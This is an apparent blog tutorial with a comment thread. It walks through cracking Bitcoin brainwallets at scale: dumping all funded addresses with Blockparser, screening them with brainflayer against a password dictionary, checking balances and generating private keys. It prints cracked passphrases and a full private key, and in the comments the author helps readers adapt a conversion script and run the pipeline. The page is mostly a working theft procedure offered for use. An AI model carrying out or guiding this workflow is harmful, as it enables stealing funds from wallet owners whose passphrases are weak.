Bitcoin Brainwallet Cracking Tools

Introduction:
New Cracking Tool Exposes Major Flaw in Bitcoin Brainwallets
http://www.coindesk.com/new-cracking-tool-exposes-major-flaw-in-bitcoin-brainwallets/

Download brainflayer: https://github.com/ryancdotorg/brainflayer

1. Password dictionary
Download CrackStation dictionary: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm

2. Install Bitcoin Daemon: https://github.com/bitcoin/bitcoin

3. Open source blockchain tool Blockparser
Blockparser download: https://github.com/znort987/blockparser
Retrieve all Bitcoin addresses using Blockparser

./parser allBalances > allBalances.txt

awk '{ print $2 }' allBalances.txt > btcaddress.hex

4. Convert Bitcoin address to Hash160 address
Tool written in Perl: http://lenschulwitz.com/base58
A slight change is needed to convert text file.

5. Convert Hash160 address to bloom filter address using hex2blf

hex2blf btcaddress.hex btcaddress.blf

6. Run brainflayer

brainflayer -b btcaddress.blf -i password.txt

7. Sample output: (first column is Bitcoin Hash160 address, the last column is the password)

6e24b1342852a8e4af3c63206f8b2266ba887ef6:u:str:1234
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi

long numeric passwords:

09b508bae503da42f05575891866d0072bcf65f6:u:str:011235813213455
32f6ace81715e0872e6db7ff4a280185205620a3:u:str:12345678901234567890
afe66e0314eb15a5cd01d95b94166ce995c3347d:u:str:000000000000000000000000000000

long alphabet passwords:

482bc0946efa74a5a3d005e693b2774e1aeb7dad:u:str:qwertyuiopasdfghjklzxcvbnm
4b1b231e9caa7f95d51ed7c99df68a5add5a1714:u:str:doandroidsdreamofelectricsheep
bf1f119153f6ecedb259f0043f9fbbc88687b22e:u:str:thepastisagrotesqueanimal

passwords made of sentences

ac8dc3fcfa4e9e91dddfc0c3fe6d7e0021292036:u:str:may the force be with you
8b0a993126c3bf8f4b28c8264b553d6aa39f2956:u:str:Money is the root of all evil.
1622dc9d9e5423d7b84122f9ef7edfa1981d9960:u:str:nothing ventured nothing gained
0c7cdc2d447af8d422dd2b54cab2f274ca88131d:u:str:No one can make you feel inferior without your consent.
8ee2d47121c480c37f9dd0a88bddf2dc21b284da:u:str:The quick brown fox jumped over the lazy dog.
2029758fa9d81f9c36f4be2ab8696ad10fc602f8:u:str:The quick brown fox jumps over the lazy dog
838edc90c250d298fc115bf028164f105e228fb9:u:str:these aren't the droids you're looking for
8c4cfbd55dd01f6c221372eba1e57c7496d7239f:u:str:This is the way the world ends.
31ae15fc484cf5fd34ecd49e1afb51e3f2174a93:u:str:tomb-of-the-unknown-soldier-identification-badge

passwords in Chinese character

7afa3b687e58d3f16feccb8244b90a87a535b85c:u:str:试试看
73b1bebd338fc051dba7282d4f99846fac01df23:u:str:中国上海

8. Convert Hash160 address back to Bitcoin address
ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Convert to bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49,
Brainwallet password is 1satoshi

9. Bitcoin wallet balance
check Bitcoin balance on Blockchain.info

https://blockchain.info/q/addressbalance/1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

10. Private key for the Bitcoin address
Download open source tool Addressgen: https://github.com/sarchar/addressgen

Example: ec42ad7fd54f931274b83f6137379206e458b106:u:str:1satoshi
Bitcoin address: 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49

Run

./genaddress.py -p 1satoshi

Output:

ECDSA private key (random number / secret exponent)
51b2156ca4b9d96c9e77938b1197b806a4a2822060da15d79f2f6f8f75655644
Bitcoin private key (Base58Check, uncompressed)
5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY
Bitcoin extended private key (Base58Check)
xprv9s21ZrQH143K3TEjPXq1CkrNDMfYWYwVNKVWqSPeEthWqd4uJKWSRnM2GX2BYktMDQrGxa2FZrpDdt5Q1qeLk4T46974eh9Eo7iHCfGcY37
(embedded private key) -> L43jHnozmKE5TYNqMwsPgXNcTfRT7TNhzDkTgaKAgYcx99Qm5LhB
------
ECDSA public key (uncompressed)
04a3599acf74fc7b781207860e8753f182fc4b8c5febe6c5f2e09381893abb4e0b290a172aa6a7ba13c5a32de6d10a024d95cf786d72e650889a4a22f29a3b84df
Bitcoin Address (uncompressed, length=34):
1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
Bitcoin extended public key
xpub661MyMwAqRbcFwKCVZN1Zto6mPW2v1fLjYR7dpoFoEEViRQ3qrpgyafW7nhb8fPtRaX2TJbCXQAfgAhMYGJ9DJeF1UVAMYu3Ucd3BqaeU9R
(embedded public key) -> 032131be64ba3f27e757c2f0f310038a8dfb768ff922448aff2841fa7954472880
(bitcoin address) -> 1Kvdg9jcdcdWGBb77Rovd8jkHjPd4eKB6t

As you can see above, the bitcoin address is 1NYEM85RpgkSofLqDfwjb21o3MD4ibSo49
the private key is 5JSGPQ2Jw1P5cVi2L8LeuWnMF5H8rLGrPPgVM2XE1cahG1BQDzY



  • Facebook
  • LinkedIn
  • Twitter
  • Google Plus
  • Delicious
  • Digg
  • Add to favorites
  • RSS
  • Email

21 thoughts on “Bitcoin Brainwallet Cracking Tools

  • Monday July 25th, 2016 at 09:54
    Permalink

    i need a more in depth tutorial on how to do this step by step properly Thanks if you can send me one by email please

    Reply
  • Saturday July 30th, 2016 at 16:43
    Permalink

    Hi pal great tut dose this still work would love to give it a shot

    Reply
  • Thursday September 22nd, 2016 at 03:24
    Permalink

    Hi,

    Great article,!

    I have one problem though, at step 4, since i am not a developer, i am having a hard time figuring out what change to do to make it process a whole file. I am using a csv file which was generated by another blockparser (not znort’s) and it only outputs addresses in Base58.

    How could I convert them all in one go to hex format?

    Thanks in advance!

    Reply
    • Thursday September 22nd, 2016 at 15:46
      Permalink

      Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
      rename it to base58perl.pl

      replace the last part of the script from:

      #Sample test taken from https://en.bitcoin.it/wiki/Technical_background_of_version_1_Bitcoin_addresses.
      my $base58_encoded_address = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM";
      print "\nRunning tests for bitcoin address $base58_encoded_address\n";
      print "Bitcoin address is valid.  Address type: '", check_bitcoin_address($base58_encoded_address), "'.\n";
      my $binary_address = decodebase58tohex($base58_encoded_address);
      print "Binary hexadecimal representation is: $binary_address\n";
      my $reencoded_base58 = encodebase58fromhex($binary_address);
      print "Re-encoded back to Base58 is: $reencoded_base58\n\n";

      to:

      my $fileSrc = 'base58.txt';
      open my $fhSrc, $fileSrc or die "Could not open $fileSrc: $!";
      
      my $fileDest = 'hex.txt';
      open(my $fhDest, '>>', $fileDest) or die "Could not open file $fileDest: $!";
      
      while( my $base58_encoded_address = <$fhSrc>)  {   
        my $binary_address = decodebase58tohex($base58_encoded_address);
        say $fhDest $binary_address;
      }
      
      close $fhSrc;
      close $fhDest;
      

      This should read base58 address from base58.txt and save the hex format address to hex.txt.

      Reply
      • Thursday September 22nd, 2016 at 15:54
        Permalink

        Awesome, it worked!

        Thank you!

        Reply
  • Sunday September 25th, 2016 at 17:18
    Permalink

    hopefully someone can make a full detail on how to make this work in linux.

    Reply
    • Sunday September 25th, 2016 at 17:19
      Permalink

      a tutorial i mean 🙂

      Reply
  • Wednesday November 9th, 2016 at 16:25
    Permalink

    how long does it take for you to get output from brainflayer? I have completed up to step #7 but now it appears brainflayer is either working in the background or doing nothing???

    I can make video tut if Jack doesn’t mind. I cant explain much of background processes as I usually compile and pack all data tightly and quickly to script it.

    Reply
    • Sunday November 13th, 2016 at 21:58
      Permalink

      use a known password for testing and you should see the output in one second.

      A video tutorial would be great. You can post the link here.

      Reply
    • Saturday January 21st, 2017 at 06:40
      Permalink

      Do you have an video tutorial, it where be great 😀

      Reply
  • Wednesday December 28th, 2016 at 01:05
    Permalink

    does it still work

    Reply
  • Friday January 20th, 2017 at 04:09
    Permalink

    Good day and keep up the good work. Please I omitted step 1 – 3 because I am trying to use my wallet ID to check how secured my wallet is but got stuck on step 4 to 5.
    Need Clarification on the following as a new be to programming:

    1. Do I need to follow the procedure you suggested on “Download the Perl script from: http://lenschulwitz.com/b58/base58perl.txt
    rename it to base58perl.pl”
    2. If I am to do same after the modification, where do I upload the update?

    3. After the aforementioned steps, in what environment in github ( Is it “bitcoin command prompt” or “brain flayercommand prompt”), do I input the command “hex2blf btcaddress.hex btcaddress.blf” ?

    4. Also. will I replace btcaddress.hex with the hex value of my public key generated via http://lenschulwitz.com/base58

    Thank you as I await your esteemed clarification

    Reply
    • Tuesday January 24th, 2017 at 16:50
      Permalink

      1. Yes
      2. You upload the file to where the btcaddress.hex file is on. Then run the Perl script to convert addresses in btcaddress.hex to Hash160 format
      3. run the command “hex2blf” in Linux environment
      4. Yes, btcaddress.hex will be updated to Hash160 format

      Reply
  • Thursday January 26th, 2017 at 04:38
    Permalink

    Thanks so much for your valued feedback.
    Pls help clarify as I am new to programming and my background is Windows.
    1. Would all the downloads from step 1 to step 7 to mounted on Linux OS like Ubuntu, KDE etc or on github?
    2. Pls. under which tool will l locate btcaddress.hex?
    Apologies to bore you as I await your feedback.

    Reply
    • Tuesday February 7th, 2017 at 11:25
      Permalink

      1. all tools run on Linux OS
      2. you create the file btcaddress.hex at step 3

      Reply

Leave a Reply

Your email address will not be published. Required fields are marked *